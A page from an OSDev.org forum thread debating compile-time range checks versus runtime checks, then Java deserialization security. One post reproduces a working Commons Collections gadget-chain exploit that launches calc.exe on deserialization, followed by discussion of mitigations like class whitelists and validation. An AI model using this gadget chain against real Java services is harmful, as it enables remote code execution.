OSDev.org

The Place to Start for Operating System Developers
It is currently Mon Mar 01, 2021 1:23 am

All times are UTC - 6 hours




Post new topic Reply to topic  [ 140 posts ]  Go to page Previous  1 ... 6, 7, 8, 9, 10  Next
Author Message
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Sat Nov 14, 2015 11:41 am 
Offline
Member
Member
User avatar

Joined: Wed Jan 06, 2010 7:07 pm
Posts: 792
Brendan wrote:
If the programmer does happen to do something like "if(x >= x.max) { return FAILED; }" then this is no different to any branch in any language. It's not a run-time check inserted by the compiler itself.
Heh, I believe this is the source of both Schol-R-LEA's and my disagreement with your claim of "no runtime checks." Because that is a check performed at runtime, and it is required by the compiler, it's just inserted by the programmer instead. (I do prefer that method though, as with the right annotations in the language it allows the programmer to control exactly where the runtime checks happen.)

_________________
[www.abubalay.com]


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Sat Nov 14, 2015 12:35 pm 
Offline
Member
Member
User avatar

Joined: Sat Jan 15, 2005 12:00 am
Posts: 8561
Location: At his keyboard!
Hi,

Rusky wrote:
Brendan wrote:
If the programmer does happen to do something like "if(x >= x.max) { return FAILED; }" then this is no different to any branch in any language. It's not a run-time check inserted by the compiler itself.
Heh, I believe this is the source of both Schol-R-LEA's and my disagreement with your claim of "no runtime checks." Because that is a check performed at runtime, and it is required by the compiler, it's just inserted by the programmer instead. (I do prefer that method though, as with the right annotations in the language it allows the programmer to control exactly where the runtime checks happen.)


For this code:

Code:
    value = 0;
    while( (c = [buffer[i++]) != 0) {
        if( (c >= '0') && (c <= '9') ) {
            value = value * 16 + c - '0';
        } else if( (c >= 'A') && (c <= 'F') ) {
            value = value * 16 + c - 'A' + 10;
        } else {
            return -1;
        }
    }
    return value;


Are these branches normal flow control or are they run-time checks?

What if I wrote this:

Code:
unsigned long long factorial(unsigned char value) {
    return value * factorial(value-1);
}


And the compiler complained that "value - 1" may overflow (become negative); and I changed the code to this:

Code:
unsigned long long factorial(unsigned char value) {
    if(value <= 1) return 1;
    return value * factorial(value-1);
}


Did I add a run-time check or normal flow control?

If you think these are run-time checks (and not normal flow control); then all software has run-time checks and therefore all software managed. It's absurd.


Cheers,

Brendan

_________________
For all things; perfection is, and will always remain, impossible to achieve in practice. However; by striving for perfection we create things that are as perfect as practically possible. Let the pursuit of perfection be our guide.


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Sat Nov 14, 2015 12:46 pm 
Offline
Member
Member

Joined: Tue Jan 21, 2014 10:16 am
Posts: 56
Quote:
Did I add a run-time check or normal flow control?

If you think these are run-time checks (and not normal flow control); then all software has run-time checks and therefore all software managed. It's absurd.


Yeah, it's obvious that there are conditionals that belong to the given algorithm and checks that only shield against programming errors like index out of bound.

The latter ones are auto generated in e.g. Java or D, and I'd also count the std::vector::at in C++.

Conflating those doesn't help the discussion, but of course a less proficient programmer could degrade any statically checked system by always just doing something like:

Code:
array[x] // error cannot prove that x < array.length

// less proficient programmer changes this to
if(x > array.length)
    throw IndexOutOfBounds()

array[x] // fine now


Cannot shield against stupid.


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Sat Nov 14, 2015 1:04 pm 
Offline
Member
Member
User avatar

Joined: Fri Oct 27, 2006 9:42 am
Posts: 1725
Location: Athens, GA, USA
Brendan wrote:
For this case; the compiler would see "x = x + 1;" and evaluate the range of the result of the expression on the right hand side (if x ranges from 0 to 999 then x+1 must have a range from 1 to 1000). Then (for assignment) the compiler checks that the left hand side is able to store that range of values, and generates a compile time error because x can only store a value from 0 to 999.

The programmer would have to fix the error. This might mean doing "x = (x + 1) % (x.max + 1)" if they want wrapping, or doing "x = min(x+1, x.max);" if they want saturation, or adding a check immediately before it, or adding a check somewhere else entirely, or increasing the range of values that x can hold, or changing it to "x2 = x + 1;", or ....

If the programmer does happen to do something like "if(x >= x.max) { return FAILED; }" then this is no different to any branch in any language. It's not a run-time check inserted by the compiler itself.

OK, this gives me some idea of your intentions. From this, I gather your intent is that the compiler flag an error (or at least a warning) on invalid possibles. This seems reasonable to me, and I had much the same thing in mind (though only for builds with a version status of 'release-candidate' and above). It also tells me that you are differentiating from the compiler inserting runtime checks automatically, and the compiler requiring the programmer to include manually inserted runtime checks.

This last part is of interest to me, as I am not sure I see them as being as clear-cut as you seem to be asserting. For example, it would seem (to me) that there is no reason this couldn't be automated, at least partially. For example, let us consider the possibility of allowing the client-programmer to define range types (either as named types or as one-off subtypes of the integer type) in which a specific behavior is defaulted:
Code:
(def Foo-Range
  (constrainted-type Integer
    (cond (((<  _ -250) (set! _ -250) _)
           ((>= _ 750) (raise-overflow-exception! _))
           (else _)))))


(This is just off the top of my head, but sort of what I have in mind; I would probably have a specific ranged-type c'tor that would cover this common case:
Code:
(def Foo-Range
  (ranged-type Integer
               :underflow #saturate
               :overflow (raise-overflow-exception! _)))


or something like it.) Similar things could be done with ranged types in (for example) Ada, though IIRC in that case the default (and only) behavior is to raise a standard exception. Furthermore, using an explicit range could allow the compiler (or library macros, in my case) to automatically optimize the variable's memory footprint (by using a 16-bit value instead of 64-bit one, for example). Of course, range checking is just one example, but the point is, there are ways in which this can be automated which would still give the client-programmer fine control over the handling of edge cases.

Also, the premise of pre-analyzing all possible paths has the potential of running into a combinatorial explosion. At some point, the compiler would have to simply give up and reject the code, agreed? That may make certain kinds of code impossible to write with such restrictions in place. This is not a very likely scenario, so I don't know if it is worth giving too much weight to it, but it would have to addressed at least in the documentation and error reporting.

There's another case which would be problematic (well, in most languages, anyway - there are languages where it is possible to programmatically generate types at runtime, but the overhead is quite steep), which is where the range itself is set at runtime. There really would be no clear-cut way to check that ahead of time in a statically-typed language, so the compiler would in your scenario require every access to the value to be explicitly tested. Since this is precisely the scenario we are looking to avoid, it is hard to see how not testing automatically would be of benefit. Again, an unlikely scenario, but something to give consideration to.

I gather, you would consider explicit checks preferable in any of these scenarios, is this correct?

Schol-R-LEA wrote:
Note that I have not given the context of this use case - neither whether it is part of a loop condition or simply some arbitrary part of the program logic, nor whether the increment or the range are explicitly defined in the program or not. Context may be relevant to your solution, I will grant, but I want to first consider the general case before moving on to specific cases.


Brendan wrote:
The context only really effects what the compiler thinks the previous range of values in x could be.

I would say it can affect a good deal more than that. For example, if the value is the index of a definite loop, and the compiler detects that the body of the code had no effect, then the loop itself (including the increment) can be optimized away.

OK, that's not really a fair example, but consider (as an example) a counting loop where the index is not explicitly used for any other purpose; depending on the processor, it may be possible to reverse the increment to a decrement in order to use a simpler exit condition, or replace the loop with with non-conditional repetition (e.g., REPZ MOV RSI, RDI). Whether it would be possible to find such potential optimizations (and know when they would make a difference) might not be feasible, but that's not the point: the point is that context can affect how you compile a particular part of a program.

Brendan wrote:
Basically it comes down to a design choice. A compiler may:
  • guarantee there are no false positives (e.g. overflows) at compile time; which makes it impossible to avoid false negatives (e.g. "nuisance" errors) at compile time, or
  • guarantee there are no false negatives (e.g. "nuisance" errors) at compile time; which makes it impossible to avoid false positives (e.g. overflows) at compile time

The first option is what I'm planning. It's harder to write the compiler and makes things a little more annoying for programmers when they write code.


Excellent, this gives us all a lot better understanding of your intentions and motivations, I think.

_________________
Rev. First Speaker Schol-R-LEA;2 LCF ELF JAM POEE KoR KCO PPWMTF
μή εἶναι βασιλικήν ἀτραπόν ἐπί γεωμετρίαν
Lisp programmers tend to seem very odd to outsiders, just like anyone else who has had a religious experience they can't quite explain to others.


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Sat Nov 14, 2015 1:22 pm 
Offline
Member
Member
User avatar

Joined: Wed Jan 06, 2010 7:07 pm
Posts: 792
Brendan wrote:
If you think these are run-time checks (and not normal flow control); then all software has run-time checks
This is precisely my point- they are (or should be) the same thing. Like I said, "it allows the programmer to control exactly where the runtime checks happen," and that includes folding them into other control flow that may already be necessary.

Brendan wrote:
and therefore all software managed. It's absurd.
Yes, concluding that everything is "managed" because it has non-compiler-enforced runtime checks often folded into regular control flow does sound an awful lot like something embryo would say.

_________________
[www.abubalay.com]


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Sat Nov 14, 2015 2:06 pm 
Offline
Member
Member

Joined: Wed Jun 03, 2015 5:03 am
Posts: 397
Octocontrabass wrote:
How does $1000 USD sound? Please read the next section carefully before agreeing.

Your insistence has made it. I finally downloaded the code from the Git and managed to run it in much simpler form (to understand it clearly).

Yes. It works. I was wrong.

Here is the code. No trash from article author's classes needed. But to compile it the JDK is required instead of JRE. And commons collections, of course. There should be exception after the calc.exe is run, but it's not important for the problem.

Code:
      Transformer[] transformers = new Transformer[] {
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod", new Class[] { String.class, Class[].class }, new Object[] { "getRuntime", new Class[0] }),
            new InvokerTransformer("invoke", new Class[] { Object.class, Object[].class }, new Object[] { null, new Object[0] }),
            new InvokerTransformer("exec", new Class[] { String.class }, new String[]{"calc.exe"}),
            new ConstantTransformer(1) };
      Transformer transformerChain = new ChainedTransformer(transformers);
      Map<?,?> lazyMap = LazyMap.decorate(new HashMap<Object,Object>(), transformerChain);
      Constructor<?> c = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructors()[0];
      c.setAccessible(true);
      InvocationHandler ih1=(InvocationHandler)c.newInstance(Override.class, lazyMap);
      Class<?>[] allIfaces = new Class[]{Map.class};
      Map<?,?> mapProxy = Map.class.cast(Proxy.newProxyInstance(Map.class.getClassLoader(), allIfaces , ih1));
      InvocationHandler ih=(InvocationHandler)c.newInstance(Override.class, mapProxy);

      ObjectOutputStream oos=new ObjectOutputStream(new FileOutputStream("d:/temp/ser.bin"));
      oos.writeObject(ih);
      oos.close();
      
      ObjectInputStream ois=new ObjectInputStream(new FileInputStream("d:/temp/ser.bin"));
      Object after=ois.readObject();
      ois.close();


And there really is some danger in the way deserialization works. It instantiates some classes and runs seemingly harmless code, but if there's a class with reflection based method calls then it is possible to run everything during deserialization by just defining some fields in the deserializable payload. It's not easy to find such reflection based attacker's helper, but article's author managed to find it in the commons collections. It means somebody else can find something similar in another place.

So, just stop using serialized objects from untrusted sources.

_________________
My previous account (embryo) was accidentally deleted, so I have no chance but to use something new. But may be it was a good lesson about software reliability :)


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Sat Nov 14, 2015 2:32 pm 
Offline
Member
Member
User avatar

Joined: Wed Jan 06, 2010 7:07 pm
Posts: 792
embryo2 wrote:
So, just stop using serialized objects from untrusted sources.
Or fix deserialization so you can use it for untrusted communication instead of other, more error-prone methods. Or isn't that what managed languages are supposed to do for you?

_________________
[www.abubalay.com]


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Sat Nov 14, 2015 2:37 pm 
Offline
Member
Member
User avatar

Joined: Sat Jan 15, 2005 12:00 am
Posts: 8561
Location: At his keyboard!
Hi,

Schol-R-LEA wrote:
Brendan wrote:
For this case; the compiler would see "x = x + 1;" and evaluate the range of the result of the expression on the right hand side (if x ranges from 0 to 999 then x+1 must have a range from 1 to 1000). Then (for assignment) the compiler checks that the left hand side is able to store that range of values, and generates a compile time error because x can only store a value from 0 to 999.

The programmer would have to fix the error. This might mean doing "x = (x + 1) % (x.max + 1)" if they want wrapping, or doing "x = min(x+1, x.max);" if they want saturation, or adding a check immediately before it, or adding a check somewhere else entirely, or increasing the range of values that x can hold, or changing it to "x2 = x + 1;", or ....

If the programmer does happen to do something like "if(x >= x.max) { return FAILED; }" then this is no different to any branch in any language. It's not a run-time check inserted by the compiler itself.

OK, this gives me some idea of your intentions. From this, I gather your intent is that the compiler flag an error (or at least a warning) on invalid possibles. This seems reasonable to me, and I had much the same thing in mind (though only for builds with a version status of 'release-candidate' and above). It also tells me that you are differentiating from the compiler inserting runtime checks automatically, and the compiler requiring the programmer to include manually inserted runtime checks.

This last part is of interest to me, as I am not sure I see them as being as clear-cut as you seem to be asserting. For example, it would seem (to me) that there is no reason this couldn't be automated, at least partially. For example, let us consider the possibility of allowing the client-programmer to define range types (either as named types or as one-off subtypes of the integer type) in which a specific behavior is defaulted:
Code:
(def Foo-Range (constrainted-type Integer
                (cond (((<  _ -250) (set! _ -250) _)
                       ((>= _ 750) (raise-overflow-exception! _))
                       (else _)))))


(This is just off the top of my head, but sort of what I have in mind; I would probably have a specific ranged-type c'tor that would cover this common case:
Code:
(def Foo-Range
    (ranged-type Integer
                 :underflow #saturate
                 :overflow (raise-overflow-exception! _)))


or something like it.) Similar things could be done with ranged types in (for example) Ada, though IIRC in that case the default (and only) behavior is to raise a standard exception. Furthermore, using an explicit range could allow the compiler (or library macros, in my case) to automatically optimize the variable's memory footprint (by using a 16-bit value instead of 64-bit one, for example). Of course, range checking is just one example, but the point is, there are ways in which this can be automated which would still give the client-programmer fine control over the handling of edge cases.


I don't just have ranged types, I only have ranged types.

For creating integers it's like "range 0 to 255 myInteger", but (for convenience) the compiler also lets you specific a range by the number of bits (e.g. "s7" is a synonym for "range -64 to 63", and "u12" is a synonym for "range 0 to 4095").

For creating floating point variables it's similar but different because there's both precision and range. The precision is specified in bits and the range is like it is for integers - e.g. "f24 range 0 to 1 myFloaty". It's also possible to set the range by specifying the exponent size in bits, so "f24e8" is equivalent to a single precision (32-bit) float.

In general this has nothing to do with how much space variables consume and programmers shouldn't know or care about storage. For example if you have an integer "range 100000000 to 100000255 foo" then the compiler can store it in 8-bits or anything else it feels like.

For structures, the compiler is free to do anything it wants. For example, if you have this:

Code:
struct {
    range 100000000 to 100000255 foo
    u32 bar
    range 1 to 7 dayOfWeek
    range 1 to 31 day
    range 1 to 12 month
}


Then the compiler might use 8 bits for "foo"; then decide to pack "dayOfWeek", "day" and "month" into a bitfield; and then (for alignment purposes) re-order the fields so you end up with this:

Code:
struct {
    u32 bar
    u16 dayOfMonth : 3
    u16 day : 5
    u16 month : 4
    u8 foo
}


Of course the language doesn't support bitfields, as there's no real reason to bother with them.

For cases where the exact layout in memory matters (e.g. for file formats and messaging protocols in normal process, and for things like page tables in kernels and memory mapped IO in device drivers) there's "rigid structures". For these the compiler has to follow a set of strict rules - no padding for alignment (other than rounding to the nearest whole byte), no field re-ordering, everything little-endian (even on big-endian machines), no tricks to reduce sizes (that "range 100000000 to 100000255 foo" variable would be 32 bits), etc.

Schol-R-LEA wrote:
Also, the premise of pre-analyzing all possible paths has the potential of running into a combinatorial explosion. At some point, the compiler would have to simply give up and reject the code, agreed? That may make certain kinds of code impossible to write with such restrictions in place. This is not a very likely scenario, so I don't know if it is worth giving too much weight to it, but it would have to addressed at least in the documentation and error reporting.


No :)

A function's signature is a contract. If you write "range 1 to 9 myFunction(range -100 to 300 y)" then the compiler checks that the function is capable of handling all possible values of y from -100 to 300 correctly. If the function is called, the compiler only has to check that the caller complies with the contract (the caller provides a value from -100 to 300). This means that individual functions can be checked in isolation, and checked in any order (and checked in parallel, possibly by multiple computers on a LAN).

Also note that for local variables the overflow checking can work in reverse. Normally for assignments the compiler ensures that the left hand side variable can handle the range of results from the right hand expression and complains if it doesn't. However, if you say that a local variable has the "auto" type then the compiler initially assumes the variable's range is from 0 to 0, and instead of complaining if there's an overflow it just increases the variable's range.

Schol-R-LEA wrote:
There's another case which would be problematic (well, in most languages, anyway - there are languages where it is possible to programmatically generate types at runtime, but the overhead is quite steep), which is where the range itself is set at runtime. There really would be no clear-cut way to check that ahead of time in a statically-typed language, so the compiler would in your scenario require every access to the value to be explicitly tested. Since this is precisely the scenario we are looking to avoid, it is hard to see how not testing automatically would be of benefit. Again, an unlikely scenario, but something to give consideration to.

I gather, you would consider explicit checks preferable in any of these scenarios, is this correct?


You'd have to choose a "max. size" type and the compiler will only ensure that all your code handles the range of the max. size type correctly. Anything beyond that (e.g. if you want to limit values to a sub-range at run-time, or only want to store prime numbers, or only odd numbers, or whatever else) is "domain logic" (your problem) and not "correctness" (compiler's problem).

Schol-R-LEA wrote:
Brendan wrote:
Schol-R-LEA wrote:
Note that I have not given the context of this use case - neither whether it is part of a loop condition or simply some arbitrary part of the program logic, nor whether the increment or the range are explicitly defined in the program or not. Context may be relevant to your solution, I will grant, but I want to first consider the general case before moving on to specific cases.


The context only really effects what the compiler thinks the previous range of values in x could be.

I would say it can affect a good deal more than that. For example, if the value is the index of a definite loop, and the compiler detects that the body of the code had no effect, then the loop itself (including the increment) can be optimized away.

OK, that's not really a fair example, but consider (as an example) a counting loop where the index is not explicitly used for any other purpose; depending on the processor, it may be possible to reverse the increment to a decrement in order to use a simpler exit condition, or replace the loop with with non-conditional repetition (e.g., REPZ MOV RSI, RDI). Whether it would be possible to find such potential optimizations (and know when they would make a difference) might not be feasible, but that's not the point: the point is that context can affect how you compile a particular part of a program.


Things like syntax checks, grammar/semantic checks, type checks, and overflow and precision checks happen first. Optimisations only happen after checks are done.

Schol-R-LEA wrote:
Brendan wrote:
Basically it comes down to a design choice. A compiler may:
  • guarantee there are no false positives (e.g. overflows) at compile time; which makes it impossible to avoid false negatives (e.g. "nuisance" errors) at compile time, or
  • guarantee there are no false negatives (e.g. "nuisance" errors) at compile time; which makes it impossible to avoid false positives (e.g. overflows) at compile time

The first option is what I'm planning. It's harder to write the compiler and makes things a little more annoying for programmers when they write code.


Excellent, this gives us all a lot better understanding of your intentions and motivations, I think.


For this aspect of it, yes. ;)


Cheers,

Brendan

_________________
For all things; perfection is, and will always remain, impossible to achieve in practice. However; by striving for perfection we create things that are as perfect as practically possible. Let the pursuit of perfection be our guide.


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Sat Nov 14, 2015 2:59 pm 
Offline
Member
Member

Joined: Wed Jun 03, 2015 5:03 am
Posts: 397
Rusky wrote:
Or fix deserialization so you can use it for untrusted communication instead of other, more error-prone methods.

Why do you think untrusted communication is better than other methods?
Rusky wrote:
Or isn't that what managed languages are supposed to do for you?

More security? Yes. Can developers of managed environments make security related bugs? Yes. But with unmanaged approach the security is compromised even more. If a program runs unbound then there's no way to change anything. And it is still impossible to guarantee program's safeness before it hit it's users.

_________________
My previous account (embryo) was accidentally deleted, so I have no chance but to use something new. But may be it was a good lesson about software reliability :)


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Sun Nov 15, 2015 4:46 am 
Offline
Member
Member
User avatar

Joined: Wed Oct 18, 2006 3:45 am
Posts: 9289
Location: On the balcony, where I can actually keep 1½m distance
Rusky wrote:
embryo2 wrote:
So, just stop using serialized objects from untrusted sources.
Or fix deserialization so you can use it for untrusted communication instead of other, more error-prone methods. Or isn't that what managed languages are supposed to do for you?

Requiring authentication only lowers the amount of privileges escalated. If you get hold of an account that can't normally do much, you can still exploit this for full administrator privileges.

I don't consider authentication a fix. After all, chances is there's some employee who neglected to change his password from "hello", or there's a simple sign-up form that gives you "zero" privileges.

_________________
"Certainly avoid yourself. He is a newbie and might not realize it. You'll hate his code deeply a few years down the road." - Sortie
[ My OS ] [ VDisk/SFS ]


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Sun Nov 15, 2015 9:19 am 
Offline
Member
Member
User avatar

Joined: Fri Oct 27, 2006 9:42 am
Posts: 1725
Location: Athens, GA, USA
Combuster wrote:
Rusky wrote:
embryo2 wrote:
So, just stop using serialized objects from untrusted sources.
Or fix deserialization so you can use it for untrusted communication instead of other, more error-prone methods. Or isn't that what managed languages are supposed to do for you?

Requiring authentication only lowers the amount of privileges escalated. If you get hold of an account that can't normally do much, you can still exploit this for full administrator privileges.

I don't consider authentication a fix. After all, chances is there's some employee who neglected to change his password from "hello", or there's a simple sign-up form that gives you "zero" privileges.

While I agree that it isn't a fix, some sort of authentication or vetting will probably have to be part of any 'solution' that comes up, at least in the immediate term, and it does at least raise the barrier to attack a small amount. Whether it raises it sufficiently to justify the added complexity, and how much said complexity itself changes the window of vulnerability, is something that would have to be determined as specific approaches get proposed and disposed. Security is a treatment, not a remedy.

What is really needed, though, are better mechanisms for continuous review of existing security resolutions, preferably one that is reflective enough that exploits of the review itself would be significantly difficult. Of course, you would need to change that procedure itself over time to make sure no new unforeseen exploits arise. Security is a process, etc.

_________________
Rev. First Speaker Schol-R-LEA;2 LCF ELF JAM POEE KoR KCO PPWMTF
μή εἶναι βασιλικήν ἀτραπόν ἐπί γεωμετρίαν
Lisp programmers tend to seem very odd to outsiders, just like anyone else who has had a religious experience they can't quite explain to others.


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Sun Nov 15, 2015 11:10 am 
Offline
Member
Member
User avatar

Joined: Wed Jan 06, 2010 7:07 pm
Posts: 792
Not sure who you were replying to, but by "fix deserialization" I mean something more like restricting it to a whitelist of classes, or restricting it to plain old data types if that's an option in the language. You should be able to easily read data from the network without worrying about it executing arbitrary code or allocating too much memory or hanging your program.

_________________
[www.abubalay.com]


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Sun Nov 15, 2015 11:27 am 
Offline
Member
Member

Joined: Wed Jun 03, 2015 5:03 am
Posts: 397
Rusky wrote:
Not sure who you were replying to, but by "fix deserialization" I mean something more like restricting it to a whitelist of classes, or restricting it to plain old data types if that's an option in the language. You should be able to easily read data from the network without worrying about it executing arbitrary code or allocating too much memory or hanging your program.

It's called validation. In case of a password there's also some kind of validation involved. So, the trusted source is the source of validated data.

By the way, there are a lot of XML parsers used without serious validation. So, in any language it is possible to invoke something on the server side if the parser is eager to invoke something data driven.

_________________
My previous account (embryo) was accidentally deleted, so I have no chance but to use something new. But may be it was a good lesson about software reliability :)


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Mon Nov 16, 2015 7:41 am 
Offline
Member
Member
User avatar

Joined: Wed Oct 18, 2006 3:45 am
Posts: 9289
Location: On the balcony, where I can actually keep 1½m distance
Rusky wrote:
Not sure who you were replying to, but by "fix deserialization" I mean something more like restricting it to a whitelist of classes, or restricting it to plain old data types if that's an option in the language. You should be able to easily read data from the network without worrying about it executing arbitrary code or allocating too much memory or hanging your program.

I'd vote to ban deserialisation side-effects altogether. If you do need them it's easy to call a method on the root deserialised object and propagate from there.

_________________
"Certainly avoid yourself. He is a newbie and might not realize it. You'll hate his code deeply a few years down the road." - Sortie
[ My OS ] [ VDisk/SFS ]


Top
 Profile  
 
 Post subject: Re: Os and implementing good gpu drivers(nvidia)
PostPosted: Mon Nov 16, 2015 9:57 am 
Offline
Member
Member

Joined: Wed Jun 03, 2015 5:03 am
Posts: 397
Combuster wrote:
I'd vote to ban deserialisation side-effects altogether. If you do need them it's easy to call a method on the root deserialised object and propagate from there.

It's not easy. The root is not responsible for the flaw in case of the hack being discussed. The way it works is complex. There actually the LazyMap class that connects fields with actions. And it is invoked during the very specific action of annotation deserialization. And the annotation is not the root class. And all the transformers from commons collections are not guilty. It's the LazyMap.

Because of such complexity there's just no way except the very thorough validation. In case of XML, JSON or even HTTP or RMI or whatever, there also are some deserializers. What if some of them invoke something like LazyMap in the process? Validation allows to limit the incoming threat, else we need to review all the parsing related code in every language.

_________________
My previous account (embryo) was accidentally deleted, so I have no chance but to use something new. But may be it was a good lesson about software reliability :)


Top
 Profile  
 
Display posts from previous:  Sort by  
Post new topic Reply to topic  [ 140 posts ]  Go to page Previous  1 ... 6, 7, 8, 9, 10  Next

All times are UTC - 6 hours


Who is online

Users browsing this forum: No registered users and 4 guests


You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot post attachments in this forum

Search for:
Jump to:  
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group